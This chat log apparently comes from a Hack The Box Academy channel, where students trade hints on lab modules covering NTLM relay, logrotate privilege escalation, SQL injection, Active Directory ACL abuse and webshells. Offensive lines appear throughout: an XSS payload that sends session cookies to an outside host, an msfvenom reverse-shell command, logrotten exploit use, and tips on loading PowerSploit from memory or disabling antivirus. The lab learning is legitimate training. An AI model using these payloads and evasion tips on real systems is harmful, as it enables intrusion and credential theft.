I did 13 today

which host are you in now?

SQL

As administrator

hint dump the ||hash|| (also hint it's not ||sam||)

my apologies i thought you were doing 3rd question since you mentioned responder and you dont need responder for the 8th question at all use the above hint

Ah, its fine

Ive also looked into ||LSASS||, only found the password hash for m***c. Then I tried||Lazagne||, got ||nothing||

Or I got this when using LaZagne ||[-] Administrator not ok for masterkey f2235d17-8d2f-4b0a-946f-ae79226da87c|| but that told me nothing lmao

if you already found it why try a different tool? 🤣 also this is a bi too much spoiler

you have the answer right here

you cant to pth

if you have the cred try to do some password spraying

I believe you can

no, lol

there is another method ||evil|| method

OMAh

Stupid evil

I always forget it exists

always ask yourself if there's a way around something before giving up on the route 😉

Good evening!
NTLM Relay Attacks:NTLM Cross-protocol Relay Attacks
Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag.
Ktonibul was able to implement the attack?
Gives an error message
[-] Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]

YOURE joking

I found that hash yesterday, like for Admin, but I couldnt RDP

So I was like, there is another way i guess

5 hours looking for that other way, already having the answer

gg

anyone else getting caught up in some of the examples they provide

how can you go through them if you dont have access to the victims machine yet

Hello, I am trying to do the splunk for windows attacks but i am a little confused on how to connect to the instance to run the splunk queries for the questions?

sudo su -

Become the admin user then run ntlmrelayx

Hi all, i'm trying to do Linux Priv Esc -> Log Rotate page. I have LogRotten compiled and running on the attack box. I've also identified which log to attack, however no file is created in the /etc/bash_completion.d folder when running the exploit. Any help here would be appreciated.

Edited: Added details.

hi does anyone know why this dont work?

has anyone completed the Malware Analysis Module "Code Analysis", I need a hint on the first question; I see where its calling sub_####8, and calling the RegOpenKeyExA , but cant find what key it is

when you run the exploit you need to add data to the log file simultaneously then only the exploit will start to execute and then you should get a DONE! message at the end of the exploit. If you dont get it you have to try until you get it and once you get it, it will take 5 to 10 seconds to get the shell

and also the exploit should be run in the victim machine not on the attack box

Thanks @undone narwhal. Sorry i misspoke, I am running the exploit from the victim machine. I'll see if I can speed up my write to the logfile. Thanks

Many thanks for the help! I did it.🙏

https://academy.hackthebox.com/achievement/285625/143

Finally 😄

So i've tried:

• moving the exploit command the background and running a forloop to echo into the logfile
• multiple tabs switching quickly and pressing enter in each
• restarting the box
• running a forloop in a separate shell tab
• modifying the payload to be simpler, just catting the flag file and writing it to htb-student folder.

Still can't get a "Done" response. Can i DM you to see if i'm running the right commands?

See 0xdf's writeup on "Book", this is taken from that section

It makes way more sense once you see someone do it

Thanks i'll take a look.

sure

So it looks like all I was doing wrong was the order of commands. I should have written to the file BEFORE executing the exploit.

that 4 hours of my life i'm not getting back.

I don't think that's the issue, the exploit just needs to be running when it rotates, so I think writing before executing might have given more consistent timing

Nope. I literally just changed the order of my 1 liner for writing and executing the exploit and it worked.

first time

if it works it works 🤷‍♂️

same as the write up

been there and will be back there eventually 🫡

thanks for the nod in the right direction. I'll be honest though, stuff like this doesn't feel like a learning experience.

Module: Intro to Assembly Language
Section: Skill Assessment

Can I dm someone my loaded_shellcode and flag optimized. I feel like I have coded the right thing But im missing something

#cybermonday

Does anyone have any good resources they recommend to supplement the material in the Pivoting, Tunneling, and Port Forwarding module? I'm having trouble grasping the concepts from this module.

Well the AD module xd

Oh nice, does that module go over the concepts from Pivoting, Tunneling, and Port Forwarding in more detail? Would it make sense to try and tackle the AD module first and then come back to Pivoting, Tunneling, and Port Forwarding?

Hi y'all, I'm stuck in the Attacking SQL Databases section under Attacking Common Services module...

I could log in and grab the Databases but, when I'm trying to connect with the database I guess is the target database I got a message about the User is not able to access the target database

reading the forum I found a hint regarding a hash which really I'm not understanding correctly

do I have to connect thru the MSSQL with the hash as PTH or do I've to crack the hash?

Hehe, i was kind of joking, by this i mean that you have to do so much pivoting during that module you will just understand it

I tried the 'IMPERSONATE' identification process and not worked for me either

I don’t have a better resource for you but everyone loves Ligolo-ng for pivoting and that one sadly isn’t covered in the module. But it makes the experience very smooth

I need help bombarding a server

Can someone tell me what network mode should I put a vulnerable test machine on VMware Workstation?

bridged mode

you're sure? it's not host-only? I'm really confused of what i see on google

I don't want the vulnerable machine to access my home network or cause problems for my physical machine

both of them work

but if you want it to be realistic you should go for bridged network mode

then you should go for host only mode, minimal risk

Thanks

"realistic" is an interesting adjective here, because what network mode you use is dependent on how you want all of the VMs to connect to each other

but also a better question for #homelab-sysadm, verify in #welcome

Hey there, I'm a bit new to the discord and the academy but I seem to be a bit stuck in the linux fundamentals at the filter contents section if there's a better place to ask the questions please let me know, but I can't seem to figure out how to answer the questions at the bottom, and it seems like it wasn't covered in the module

I'm trying real hard to avoid just looking answers up, as I'm actually trying to learn!

Here's this also if it helps

what have you tried so far

If I'm honest, I'm not sure where to start with these

I'm not sure how to see 'listening services' on linux

you already have the ||ssh|| credentials

Right, let me ssh back into the box rq

hint: ||you can use the netstat command with some options to find all listening services on the machine||

also, while I'm at it, to connect with my vm to the target, I've been downloading the vpn file and then using cp to copy the file to another directory I made with mkdir called HTB/ovpn/ and then sudo openvpn (.ovpn file)

is there an easier way to do that?

or am I doing that the right way

and that's necessary to ssh in right?

you have to be connected to the htb academy ovpn file to interact with any of the machines if that’s what you’re asking

I was pretty sure about that, we're good

Okay, I just tried ||netstat -l | grep -v localhost | wc -l || I'm not sure if grep really applies here though, my output was 113, but it said it was wrong in the question

without grep it outputs 118

don’t forget the question mentioned not on ||localhost(127.0.0.1)|| and ipv4 only

which means you should exclude that address

I'm sorry, still a bit confused, I just tried || netstat -l | grep -v 127.0.0.1 | wc -l || which returned 118, after that I tried that I used || netstat -l | grep 10.129.120.7 | wc -l || which returned 1 and the answer still seems to be incorrect. I've checked netstat and didn't see much info about excluding certian addresses so I tried it through grep, also, I just tried ss and it seems like it's a bit easier to exclude certain types of values but I'm really lost there too, I tried || ss -l -4 || and it showed a list of tdp/ucp connections but the amount didn't check the question off either edit: netstat was 2x

that’s because you’re using an incorrect netstat command

you need to follow what the question said and find all the services LISTENING on ALL (-||a||) interfaces and ipv4 addresses only (-||n||) excluding the localhost

So, I'd need || netstat -l (listening) -a(for all sockets) -n(and n? so it doesn't resolve names?) i've still kept the | grep -v (to hid or exclude) 127.0.0.1||

or is that still wrong :3

you don’t need to use the -l option when using -a

Oh okay, they did return the same word

The only problem is that it's still saying it's wrong

||grep LISTEN||

OH SHIT

don’t forget that

damn

|| htb-student@nixfund:~$ netstat -a -n | grep -v 127.0.0.1 | grep LISTEN | wc -l ||
104

I've still got a big oof, it's still wrong

you don’t need the wc -l

i feel like the answer is staring at you

I dunno man I don't think so

I'm dyin here

I only had the wc -l to count em but, it still didn't return the right amount either way

do you want to see the output?

i think this should work ||netstat -an | grep -v 127.0.0.1 | grep -w LISTEN | wc -l||

@coarse bay

I'm lost

I feel like that should've worked

you haven’t spawned the target system

I just refreshed it must've bugged

lemme retry it

lmao

delete this

oh thanks

okay what about ||grep -w LISTENING||

wait

okay nvm

Okay, I think I'm just going to try and find the answer, I think i've got a good understanding of how to use netstat now LMAO, but would you mind attempting to help on the next two and then I'll leave you alone

it returned 0 btw

I think we were on the right track though, but the answer I found was this || ss -l -4 | grep -v "127.0.0" | grep "LISTEN" | wc -l ||

my bad

it doesn't show it but there are \ before the .0's

It's okay we're suffering together

hint: for the next question you have to use a command to list all the currently running processes on the machine

for all users

okay, I tried || jobs || but it didn't seem to return anything

I tried || jobs --h and also man jobs ||

still nuthin

have you tried the ||ps|| command?

OOPS

Okay

Prolly doin this wrong again but hey! || I've tried ps -e to show all the processes, and I can't find a ProFTP and then I realized it needed it under a certain user, so I did -u to show users, but it only shows htb-student||

also sometimes it doesn't let me type anything in the console and I have to re-ssh in, did I do somethin wrong

it’s probably just a timeout

ah okay

for all users

Okay, good news

I found proftpd with a grep like this || ps a -e | grep "ProFTPd" ||

but the user isn't shown

oh waity

okay nvm

Also, this was the output from that

to see the user who started each process you can use the ||-u|| option

that gave an error about syntax

error: list of users must follow -u

Usage:
ps [options]

Try 'ps --help <simple|list|output|threads|misc|all>'
or 'ps --help <s|l|o|t|m|a>'
for additional help text.

For more details see ps(1).

try ||ps -aux | grep ||

wait what's the x

|| htb-stu+ 6505 0.0 0.0 13144 1076 pts/1 S+ 23:16 0:00 grep --color=auto ProFTPd||

to list daemons and other backgrounds processes

ah okay

Just to put it out there, I tried putting in the basic username of htb-student and it didn't work

from the last output

did this work?

It wants the username, I just tried the abv. sersion htb-stu+ but it didn't like that output

Okay I tried something for shits and giggles, and I'm more confused now

I tried putting in || ProFTPd || just to see if it'd work

and it completed it

but I'm left more confused now because the question is asking for the user that process is running under

try this ||ps -e -o user,cmd | grep||

so technically shouldn't it be htb-student?

I think you meant to put ProFTPd at the end so I added it, and this was the output || htb-stu+ grep --color=auto ProFTPd ||

just read the proftp configuration file in etc to see the username😭🙏

My man, you have done nothing but confuse this guy more, with this awful advice.

DM me, and I'll help you with the mess he made.

Thanks for trying dog

anyone who has done Attacking common services - SQL Databases....!!!!

I am not being able to enumerate the database

All of the commands you need for that section are in the text, it's a matter of recognizing what kind of SQL you're working with

can DM to you?, cuz the command applied are not working

identify the SQL is self emplained in the password

with not being able to enumerate the database I mean use the database, I could crack the password from the hash but I'm not able to log in with that user|password

You can DM, but I might not reply for a while

heading somewhere

anyone has an idea why this message error

||sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Msg 18452, Level 14, State 1
Server 'WIN-02\SQLEXPRESS', Line 1
Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
Open Client Message
Layer 0, Origin 0, Severity 78, Number 34
Adaptive Server connection failed
Open Client Message
Layer 0, Origin 0, Severity 78, Number 34
Adaptive Server connection failed||

You are supposed to add the two bitmaps. So, 512 + 128 = (ANSWER)

who has done attacking common services | attacking SQL databases, could please let me know if this command worked for you ||sqsh -S 10.129.203.12 -U \WIN-02\mssqlsrv -P 'pxyz...1' -h ||

<@&861185840277487616>

o.O

Nice cat

(^o^)/

trying to import powersploit in the target machine by ssh

i was able to do it in my local windows vm but its giving me error in the machine , dont know whats wrong

blocked by AV

what can i do now to solve it then

obfuscate it or disable av i guess

Use a download cradle that executes it from the memory...look in the file transfer module for a powershell command that starts with "IEX"

i dont think it was suppose to be that hard

Module: Linux Local Privilege Escalation - Skills Assessment
i'm trying the optional way. I have a reverse shell already. What should i do to escalate the shell?
Saw a DB and inside only got 1 user which is already used to login into W*
anyone can drop any hints?

In ICMP section of Pivoting module I get error when trying to start ptunnel server on pivot host the error is

./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng) ./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)

https://academy.hackthebox.com/module/158/section/1438

i was trying the nmap medium lab for firewall evasion. To find the dns server version, i used the nmap -sSU -p 53 --script dns-nsid <target ip> but still its not showing the version. Did anyone face it

Hi everyone. Module : "Attacking Web Applications with FFUF" i'm at the "skill assessment part1. It asks for the page that says 'you don't have access' ; i'm using FFUF but just to understand if i'm doing something wrong ; ffuf returns me with `________________________________________________

.php [Status: 403, Size: 287, Words: 20, Lines: 10, Duration: 16ms]
index.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 16ms]
[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 15ms]
.php [Status: 403, Size: 287, Words: 20, Lines: 10, Duration: 15ms]
:: Progress: [175302/175302] :: Job [1/1] :: 2589 req/sec :: Duration: [0:01:14] :: Errors: 0 ::
` but i don't understand why it shows 'status 200' pages but no names, nothing.
any hints or suggestions or whatever would be much appreciated. few days i'm on this and can't figure out what's going on.

nevermind... i'm just dumb i guess 😄 Found the reason 😄

Module "Active Directory Enumeration & Attacks" -> "Skills Assessment Part I"
After I kerberoast and crack the hash for a service-user password, bloodhound hints me towards a host where I have sqladmin rights, but the hostname ist not known by the DC. Also the next questions asks about MS01, which does not seem to have any connection to the service account I got. What am I missing here?
Edit: Nevermind. Bloodhound seemed to miss something

SQL INJECTION FUNDAMENTALS --> Writing Files --> Find the flag by using a webshell.

Someone can give me a start? I cannot figure out how to solve this one.

HI

is the machine for free

how can i launched

it

i am totally beginner

if you are new here read #welcome and #rules and if you are on the academy here is how modules work
https://help.hackthebox.com/en/articles/5297528-introduction-to-modules-paths

only tier 0 module are free

first check the 3 requirement showd on top of the section

did you do the step Building Ptunnel-ng with Autogen.sh on your machine? if not then that's the issue

which question are you on?

which module are you on? also try powershell -ep bypass before you import powerview also try to disable defender if it is running

In Attacking Common Applications - Assessment I, I ended up getting the flag in a round about way, but the question says to obtain a shell... anyone got a hint on how I could do this?

i have completed all 5 flags.

But i wanted to try the optional way without using the SSH credentials.

I got a reverse shell through ||WP||, but am unsure of how to proceed from there

i dont neend any flag to continue , but i wanted it to install in on host machine for practice

Done that, got them all three, can write and read files but have to find out how to know the file i am looking for. Now experimenting with load_file()

hey guys I stuck in Union Clause from SQL Injection module every command with UNION i write it say its wrong

i need help 🙂

What have you tried

||```MariaDB [employees]> SHOW TABLES;
+----------------------+
| Tables_in_employees |
+----------------------+
| current_dept_emp |
| departments |
| dept_emp |
| dept_emp_latest_date |
| dept_manager |
| employees |
| salaries |
| titles |
+----------------------+
8 rows in set (0.093 sec)

MariaDB [employees]> SELECT * FROM employees UNION SELECT * FROM departments;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

Can anyone help me with this question

SQLMAP ESSENTIALS

Attack Tuning

What's the contents of table flag7? (Case #7)

sqlmap http://IP:PORT/case7.php?id=1 --union-cols=5

That's my command but it doesn't work. Can I get any help please

Did you google the error?

jezz...that debugging section in malware analysis module was a beast

instructions were sort of hard to follow---took me a couple of times

look about right (hence you should remove the command due to spoiler 🤣) but try adding the --dbs tag just for a sanity check to see whether or not it's work

not sure what you mean by that but if you can write file just write a shell or a command that cat the flag into a php file and run it

pls ask your questions here first before ping a bunch of people

not sure what services did you get a shell as but i'm pretty sure if it's unintended there won't be a path to PrivEsc

with that being said there is some unintended ||vuln|| that can give you root instantly

bruh these thm mods

I just asked them how to install Powersploit through Powershell and they asked too many questions like where it is, and what u doing in the end, they said We can help you.

I've been stuck for a while in LOGROTEN in Linux Privilege Escalation, problably i'm doing something stupid but I can't get it through, can you tell what i'm doing wrong?:

COMMANDS:
TARGET: ./logrotten -p ./payload ../backups/access.log.1

which gets this when modifiyng file...

Waiting for rotating ../backups/access.log.1... Renamed ../backups with ../backups2 and created symlink to /etc/bash_completion.d Waiting 1 seconds before writing payload...

ATTACKER: nc -nlvp 9001 listening on [any] 9001 ...

which path to follow

this

or this

If you already have the knowledge from the Information Security Foundations path, then you can start directly with the CPTS path

i found this https://stackoverflow.com/questions/3655708/error-the-used-select-statements-have-a-different-number-of-columns
but i dont understand

first in a different terminal did you run something like echo "test" >> backups/access.log? also pretty sure this doesn't matter but did you try with the access.log file instead of access.log.1

To do the union select you need to make sure the amount of columns are the same

In this case employees has 6 columns and departments only has 2

In the section it shows what to do to “fill up” those columns it doesn’t have

where

In the section…

I cant find it and in the question or other ways it dont show what to do in this situation

1,2,3,4…..

Hi

looking for a hint with this? "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) " in ACL Abuse in Active Directory Module

I'm in bloodhound looking at the actual rights and the answer of ||Generic-Write, GenericWrite, Add-Self, AddSelf|| is not working unsure of what I am doing wrong

or does this want me to provide the non-human readable GUID as an answer?

I've tried the filtering part, unsure what I am doing wrong

Hello, wondering if someone can help me with that Antak module

on the first question "Where is the Antak webshell located on Pwnbox? Submit the full path. (Format:/path/to/antakwebshell)"

On the Windows box it is " C:\inetpub\wwwroot\status.inlanefreight.local\files\Upload.aspx"

Holy explitive

Its /usr/share/nishang/Antak-WebShell/antak.aspx

Talking to myself on this helps me solve the module myself, thank you!

can I get some help with the logrotate exercise for linux priv esc?
I'm running logrotten, and I'm appending to /home/htb-student/backup/access.log
my payload is supposed to pop a reverse shell back to me, log rotten executes successfully but I don't get the shell back, what could I be doing wrong?

if I want to start bug bounty wich modules i should complite first ?

the CBBH path

im on this right now

you are on the right track then 🙂

oh good thanks

but i mean i should complete all of them to be abale find my first bug

or i can be more specific and earn the next month payment

?

Expecting to get money from bug bounty while youre new is optimistic

hmmm

how it works then ?

so its not possible to found the old bug ?

like in the hacker1

i think madf0x means that it’s hard to find bugs, especially as someone new with little to no experience. There is also a lot of competition for the big companies with big payouts on hackerone, and as someone new it might seem impossible. Not to mention not all companies on hackerone (and other platforms) offer a bounty.

competition for pub bounties are pretty massive

^^

if you're gunna go bug bounty hunting be pleasantly surprised if you even find anything, more surprised if they actually accept it and even more surprised if they actually pay out for it

i can’t speak for the CBBH path and exam, but i’d start there and then maybe do the web based challenges and content on the main HTB platform

A lot of successful bug bounty hunters are either A. Incredibly skilled B. Got connections for Private bounties C. grinded out a lot of freebie bugs over time till they started getting invites to private bounties or D. Combination of the above.

Another thing is that complete the H1 CTFs and they will invite you for private program that can be little easier after than it is pure skill and analysis. You vs the scope if target

What do you mean with old

First come first served

hello y'all, who can give me a hint with the last question of attacking rdp section under attacking common services module?

I'm being not able to find any information|reference about administrator to grab their hash

I tried with responder, but I just could find the regular user shared in the exercise

the target machine is running Win2019 and the RDP Session Hijacking explanation according the material, this method NOT longer work in W2019

Low effort troll

Can I DM someone about Attacking DNS in Attacking Common Services?

What about Pass-the-hash?

I mean like finding a simple sql bug

I know PTH is the way to grab the flag, but I need to find/obtain the hash first I'm gonna try to dump the SAM db

You have solved #1 🙂 take a clooser look at the only file available

Overcomplicating

LoL x1k, I saw the file but not opened, 1 more time LoL, ty dude

is it possible to get CBBH certification in one year or less and know the material really well?

yes

everything is relatively but especially learning speeds

IMO follow your curiosity. Do not think of learning as a checklist, where you've spent 8 hours reading about X and are now ready to move on. Taking the time to truly dive-in and digest the content, I suspect you will think you yourself "but wait, how does THAT work?..." Keep exploring until you find the answer. Usually it leads to another question 😉

This I believe leads to true learning, and it's difficult to give a time estimate for.

Guys, I am in windows attacks and defense, trying to open this machine but it is not working

Has anyone else been having trouble starting Pwnbox instances, even with a paid account? Happened while demoing the academy to try to get some grant money to buy subscriptions for the students. 😢

Me tooo

Is there any issues with a website?

let me look into it 💪

if I'm not gonna do the CREST certification because I'm in the US, is it still worth it to do CREST skill paths in order to gain more advanced skills in the future?

I think the error from the exact website!

I hope they can fix it soon

how worth it are CREST modules without the cert?

finally finished that malware analysis module--fun stuff

CREST is becoming more recognized in US tho
https://www.pivotpointsecurity.com/how-crest-professional-certifications-compare-to-other-industry-qualifications/

The CREST modules are just taking existing modules in the academy and putting them in a path, with possibly a few made specifically with CREST in mind

CPTS and CBBH is all in that path iirc but not 100% sure on that

Try refreshing the page and trying again. It started working for me just now.

Worst time for that to happen lol

right that's what I observe too. I'm thinking if I do CREST paths as I do HTB Academy and Main Platform, I have some structure to try to get more advanced hacking skills. That's my hope anyways. I want to be able to do advanced or hard main platform boxes on my own eventually.

or if CREST does become valuable in US to get certified

because it looks like a better cert than OSCP

could make employers take me very seriously

Follow whatever path you want based on what skills you want to develop 🤷‍♂️

honestly man it feels like you spend too much time minmaxing what you should focus on learning instead of just going out and learning it

right but I'm wondering if CREST path actually gets you advanced enough skills to get CREST or if it at least gets you enough skills to do advanced HTB boxes

ok ya I do overthink stuff

Just learn.

ok

Once you do some basic learning, you will find what areas you want to improve on

I mean some overthinking is good but at the end of the day its not gunna teach you how to do LFI until you start just learning LFI ya know

But you need to take that first step before trying to min max

ok got it thank you good idea

I spent some time on Nmap module today

working through CBBH and CPTS

lmao gonna finish CBBH first so I can bug hunt and have income sooner lmao

but CPTS is also fun

but gotta work on Nmap first

I think Nmap is valuable for bug hunting so doing this one module and some main platform boxes

Do not count on bug bounty as sure fire income unless you’re goated on the sticks

I know but like its resume experience

and small extra income

Just wanted to make sure before you get extremely frustrated when you start trying 😅

I know thank you for your concern

its not even small, youre really not going to get an income whatsoever doing bug bounties

ok got it point taken

it takes a lot of factors to make money from bug bounties and skill is only one part of it

in the Laudanum, One Webshell to Rule Them All section, the module mentions that the webshell gets uploaded to (double backslash slash before "files")\files\ directory. but when we upload the webshell , it says that the webshell is uploaded to C:\inetpub\wwwroot\status.inlanefreight.local\files\shell.aspx. so why does the course material state that its uploaded to (double backslash before "files" )\files\ ?

hello, everyone know what the differences of using -windows-auth and without using this option?

hi guys im doing the shells and payloads (the live engagement) im strugling to make a war file somehow my kali dosent have jar command anyone able to give a hand please and thanks

Has anyone been working on blockchain challenges ? I have a quick question

ATTACKING COMMON SERVICES: Attacking SQL Databases
Question: What is the password for the "mssqlsvc" user?

Logged in with : mssqlclient.py -p 1433 htbdbuser@<ip>
Checked tables of the master, tempdb, msdb databases but found nothing regarding this.

Where am i supposed to find the user and password tables in this?

+1

read #welcome and #rules after that use /verify at #bot-commands and ask that at #challenges

the jar command is just java if your kali doesn't have it just install java also you can use msfvenom for this and i think the section does show some method about using zip to war file with anther shell

hint there isn't anything in the DBs, try a different method showed in the section

thanks i realised the error in my ways 😄

why does xfree rdp give me a black screen on this module - https://academy.hackthebox.com/module/143/section/1485

I have rebooted my vm, reverted that vm, and did wall the usual troubleshooting.

If I use remmina it works

here is the command I used - xfreerdp /v:10.129.27.59 /u:htb-student /p:Academy_student_AD! +clipboard /cert:ignore

Press enter, VM is in an energy saving mode or something

Still doesn't work, tried all of that

wait, lol it worked, Oh I wish I could just delete everything I just posted

Yep

I mean, you can

yeah but your responses wouldn't make sense

That's what makes it funny

true that

I'll keep em there lol

Need more coffee I guess.

But tbh you're not the first, and probably not last, person that's run into that

Yeah, I thought I hit enter, I probably did but without that screen in the foreground.

Hey guys, I got struck in the skills assessment. Could you help me.
when I'm using that cookie I'm unable to login as admin.
||auth-session=s:qPppmnahd3mYZhS3ihr6GzND0F_61XgV.8TrV0JwCrXeURX4J588m3AOzzH4RQ76PHS0RCbscSH4||
I obtained it by using payload:
||<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://10.10.15.59:8000/log.php?c=' + document.cookie;"></video>||

hi can i use the vpn of htb academy in htb boxes or is it two differents conf?

Two different services

ok tkx

Could you answer my question above

I dont know. Haven't done that nor do I even know what module you're working on.

The module is skills Assessment in session security

Yeah I haven't done this one

doing the password attacks module atm but damn shit is slow

Yep that's mostly intentional

Setting hydra threads to 48 tends to be the most stable

Biggest tip for password attacks: save all passwords you find. This module reuses a fair bit

oh, good to know

ill get on that after this one, im currently trying to get the sam user but ive resigned to just waiting a little longer

If I recall a section further in the module directly tells you to use the previously cracked password for another user

imagine if we had to bruteforce the username sam as well

OK so tip: did you use the pws.list and custom.rule from the resources download?

Good morning

I am on "The Live Engagement" module

and am trying to simply open a web browser on the Foothold machine

to open up the webpage on status.inlanefreight.local

Is there a command that I need to run, I dont see firefox or any browser that I can use

I tried the command xdg-open but that just opens Pluma

Can anyone help me?

i did, yeah

just took ages

but ive got it now 👍

That's good :) I hope you weren't bruteforcing ssh and did the other available service

Can anyone point me in the correct direction, I am asking chatgpt with no good answer other than the xdg-open command which only gives me text

Type firefox in the terminal

holy

Thank you

This question has been asked a bunch of times here

Well, we appreciate it

you can also use burp’s browser, that’s what i ended up doing

anyone i can dm to discuss about an error ?

What is it about?
Just ask here

need help on Attacking Common Applications module: osTicket...
i got where to login but i can't find credential to login for Customer or Agent user

https://academy.hackthebox.com/module/113/section/1214

A screenshot of the question would be nice

Hi Guys still at the hells and payload second host . i got as far as giving it the payload with metasploit but i get a invalid json response and it exits after it and never runs shell

hint check the example, the cred part did have a note that the data is fictional so (i think) the is no intended way to get the cred for this on your own

Make sure you set the options correctly

I have tried everything i can, i also follow the example except the dehashed one, so the cred is on simple list right? can I brute force it?

no the cred is in the example 🤣

ughhhhhhhh I GOT IT!, my 12hours is gone for nothing hahahahaha, I'm sure that i tried that cred in the example but its not work

thank you very much bro

Can someone give me a nudge on Windows privilege escalation: credential hunting? I've got several files containing passwords, and none seem to be the right answer. Not sure what I am missing here.

Which pass do you need and what files did you get

Hello - I am stuck on "The Live Engagement" specifically 'Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)'

I have run the following msfvenom command to create the war payload and uploaded it - the IP address I see of the Foothold ia 172.16.1.5

msfvenom -p java/jsp_shell_reverse_tcp LHOST="172.16.1.5" LPORT=4343 -f war > reverse.war

I am able to uploade the reverse.war and deploy it then run a listener on the Foothold (sudo nc -lvnp 4343) but do not get a connection

good day friends, i am at Attacking Common Applications Attacking Splunk, i think in inputs.conf i have to change rev.py to .ps1 , so i did but i still cant get a rev shell

am I correct so far here any advice on what direction I should be looking in is super appreciated

i now have a bin dir with rev.ps1 and run.bat , and have a default dir with inputs.conf

Is anyone able to help me with a question from the Pass the Hash module in Password Attacks? I have David's hash but when I connect to the share, I don't have permissions to go into the "david" folder.

Thanks in advance ^

try Pass the Hash from Windows Using Mimikatz.

I am RDP'd in as david

https://tenor.com/view/cry-gif-23395361

man, Exploiting Web Vulnerabilities in Thick-Client Applications is breaking me!!!

Wait, I see what you mean now thanks!

Tried that, still getting access denied

Have you solved ques 1 and 2 ?

yes

I feel like I have done everything right, I am logged in as david

dm me

ok, thanks 🙂

Hi, are there special chat tab that I am allowed to get some advise or someone can PM me an we can address somethings

any compassion can do all I want is your support my soul is lost I need direct answers

read #welcome and #rules after that use /verify at #bot-commands to get access to more channels

I did

long time ago Im exhausted by everything

I dont want more bureaucracy, but it said "to mention in chat if you want someone's help, you are not allowed to PM directly"

that's the only rule I remember

i mean verify your account with your HTB account

ask a therapist on betterhelp

huh????

no idea if you have mental or technical issue lol

nevermind

yeah funny

right?

I hope you end up on the list on the darkweb

Hi guys!

your name is still white so no you didnt verify your account

this channel is HTB academy modules if you guys want to chat take it to #general

when clicking your payload did you get redirect to a directory with your payload name? if not then your payload probably didn't execute

oh wow that guy has send 100+ message here and it's all bs and unrelated to the academy

How is this not the answer to the last question - https://academy.hackthebox.com/module/143/section/1485 or it's ||Generic Write||

it will not accept either answer

thats the colloquial name. it wants the actual Object ACE name

bloodhound isnt gunna be useful here

ah gotcha

ty

powershell isn't doing anything - I have the SID converted but it won't budge

No error either

keep waiting based on this - Note that this command will take a while to run, especially in a large environment. It may take 1-2 minutes to get a result in our lab. ?

I just did this one. You just need to be patient.

where can i get lazagne standalone for linux

the one from the repo needs requirements to be installed and i cant do that beacuse i dont have internet on the target

from google

or compile yourself

which module

you can just run this one - https://github.com/AlessandroZ/LaZagne/releases OOB no requirements AFAIK,

How patient? It's been like 7+ min

You could try to be more specific with the Identity, If you know the exact one you are looking for Otherwise you'll need to be very patient

Good idea about the -Identity

It took me like a solid 20 minutes at least haha.

no kidding lol okay, I don't feel crazy. I thought I needed to reset the machine

any help please, i am stuck

https://tenor.com/view/dj-khaled-gif-24713013

||Get-DomainObjectAcl -ResolveGUIDs -Identity "CN=GPO Management,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL" | where {$_.SecurityIdentifier -eq $sid} -Verbose||

Hey guys, is there any module that teaches how to setup a linux distro? Sorry, am new 😦

https://academy.hackthebox.com/module/87/section/883

Or just Youtube if you like to learn that way

Thank you so much! I just started my training and was wondering where was this taught

No problem Happy Hacking !!

Don't know if there is a "suggestion" box outside of this channel, but I would like to suggest adding a ligolo-ng section into the "Tunneling and Pivoting" module... To whom should I direct such a suggestion?

Each module lists who the writer is, on the first page.

🤔 Good "suggestion."

For the pivoting module,

Co-Authors: TreyCraf7, LTNB0B```

Yep, found it...

@mellow whale How difficult would the above suggestion be? (Assuming this is you...) Couldn't find that Chetan-8.

please can anyone help me on atacking dns section of common services module...

https://academy.hackthebox.com/module/116/section/1512

hey @warm drift what's up, what kind of help are you needing?

dm?

yup

shoot

hey, I was wondering if I can create a module in HTB Academy and what are the terms and conditions?

I connect to user|| "wley" in my PowerShell session|| but I can't ||force change the "damundsen" ||user's password. Anyone run into this issue in this section. The user clearly exists. https://academy.hackthebox.com/module/143/section/1486

Maybe use 'UserPrincipalName' as the identity?

why doesnt the options method show me the allowed headers?

@keen summit Put this into #858470491676737536

🙂

hey do someone know a linux command to url encode a string?

Module 134 aka Web Attacks, under the section of Advanced Exfiltration with CDATA, the example given to read the file contents of submitDetails.php. Does this example given work in the lab system given for that section. I have the flag already, however I can't get the example to work as it was given. Multiple people have had this issue in this forum, I have yet to locate what I screwed up. Any suggestions would be greatly appreciated.

any one have an idea what could be wrong here?

try it on ||index.php|| it will work

You my man are MVP! It is working awesome.

anyone can give a hint how to use telnet with username and password?

Windows Privilege Escalation Skills Assessment - Part I

I can´t use wget, Invoke-web, certutils... to get the nc.exe to the machine and execute a reverse shell

Please, any help, ideas... 🙏

helloo i make the skill asesement of the file inclusion module i have find the file flag but i cant find the root path i have tried a lot

you can just telnet <IP> <PORT> then it will ask for username and password if it's set up that way

Hey, not sure what you're asking here... the root path should just be / i.e. /flag_xxxxx.txt

I figured it was because I have to download it to C:\Windows\Temp, but certutils is failing. Anybody know why? this shouldnt happen, another student replicated it and worked for them

Try to use these with powershell, they will work

no the root directory of the file system

the root directory of the filesystem is /. cd /... its where etc, var, opt etc. all are

i have trie with ffuf it give me this but dont work /var/ww/html

oh the webroot?

yeah

now i have this

Tried without success 😢

can you try a powershell revshell from revshells.com?

yeah thats the way... so if you're using ||log poisoning|| for command execution, you should just be able to do cat flag

Try wget

i have tried this lot of time (but iam so idiot thanks @fringe shell )

it took me a while to get this as well... if you still need more help, feel free to dm

No success @fringe shell @undone narwhal 😭

